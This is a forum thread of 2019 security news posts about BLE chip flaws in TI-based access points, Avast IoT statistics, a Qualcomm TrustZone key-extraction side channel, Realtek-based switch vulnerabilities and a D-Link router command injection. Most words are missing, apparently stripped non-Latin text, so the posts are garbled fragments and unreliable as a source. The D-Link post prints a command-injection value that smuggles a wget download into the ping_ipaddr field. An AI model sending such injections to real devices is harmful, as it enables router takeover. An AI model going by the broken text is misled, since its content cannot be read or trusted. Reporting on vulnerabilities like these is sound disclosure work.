!

al 
al

June 23, 2019 03:13PM
Bluetooth- TI,



Armis BLE (Bluetooth Low Energy) Texas Instruments (CC2640, CC2650 CC1350), Cisco, Meraki Aruba . BLE-, . Bluetooth Low Energy ( 10 ).

BLE IoT- (, ), . , (, ), (, JavaScript- HTTP-) .

(CVE-2018-16986)

Cisco Aironet (1540, 18xx, 4800) Meraki MR (30H, 33, 42E, 53E, 74) BLE-. . advertising-, BLE- . advertising- , . , . BLE ( ).

(CVE-2018-7080) Aruba (AP-3xx, IAP-3xx, AP-203R, AP-203RP) OTA- BLE- TI. , . .

Cisco, Meraki Aruba , . Texas Instruments BLE-STACK 2.2.2. , , -, BLE, , -, .
avatar Re:
June 23, 2019 03:41PM
59.7%

Avast (PDF) " ". , 59.7% - .

, 40.8% , , .
69.2% , , . 31.8% - .

:

(32.9%) , (28.9%). (20.8%), (7.8%) (5.3%). 40.8% , 17.7% - , 14.7% - , 14.6% - 3.7% - . : (45%), (22.9%), (17.3%), (6.1%), NAS (4.4%), (2.5%).

. 40.3% 5 , . (46.4%), (15.4%), (11.2%), (8.9%), (8.3%), (4.3%), (3.7%), NAS (0.9%), IP- (0.5%) (0.3%). (31.1%), (23.7%), (10.3%), (10.2%), (8.9%), (5.3%), (3.1%), (2.6%), (0.7%) (0.8%).

, 16 . 56 11 . , Avast Wi-Fi Inspector , .
avatar Re:
June 23, 2019 04:04PM
Qualcomm, TrustZone



NCC Group (PDF) (CVE-2018-11976) Qualcomm, , Qualcomm QSEE (Qualcomm Secure Execution Environment), ARM TrustZone. SoC Snapdragon, Android. , , Android Qualcomm. Qualcomm - Qualcomm 19 2018 .

, ARM TrustZone , c . TrustZone , , . . , .

, . , , Android Keystore. . 224- 256- ECDSA , Nexus 5X. 12 , 14 . Cachegrab.

TrustZone - , . Prime+Probe, , , TrustZone.

ECDSA Qualcomm (nonce). , .

Qualcomm : "nonce". Qualcomm , "nonce", 256- ECDSA.
avatar Re:
June 23, 2019 04:12PM
avatar Re:
August 08, 2019 01:29PM
, Cisco, Zyxel NETGEAR RTL83xx

RTL83xx, Cisco Small Business 220, Zyxel GS1900-24, NETGEAR GS75x, ALLNET ALL-SG8208M , , . SDK Realtek Managed Switch Controller, .

(CVE-2019-1913) web- root. . , .

(CVE-2019-1912) , shell . web-.

(CVE-2019-1914), web- root. Cisco Small Business 220 (1.1.4.4), Zyxel NETGEAR. 20 .

RTL83xx, :

EnGenius EGS2110P, EWS1200-28TFP, EWS1200-28TFP;
PLANET GS-4210-8P2S, GS-4210-24T2;
DrayTek VigorSwitch P1100;
CERIO CS-2424G-24P;
Xhome DownLoop-G24M;
Abaniact (INABA) AML2-PS16-17GP L2;
Araknis Networks (SnapAV) AN-310-SW-16-POE;
EDIMAX GS-5424PLC, GS-5424PLC;
Open Mesh OMS24;
Pakedgedevice SX-8P;
TG-NET P3026M-24POE.
avatar Re:
October 13, 2019 05:52PM
D-Link

D-Link (CVE-201916920), "ping_test", .

, "ping_test" , , web-. , apply_sec.cgi "action=ping_test", , ping_test . ping_test, ping IP-. , wget "echo 1234" "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20[test.test] 1234)".

:

DIR-655 3.02b05 ;
DIR-866L 1.03b04 ;
DIR-1565 1.01 ;
DIR-652 ( )

, D-Link , , . web- IP-.

, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 DIR-825, .
, .

,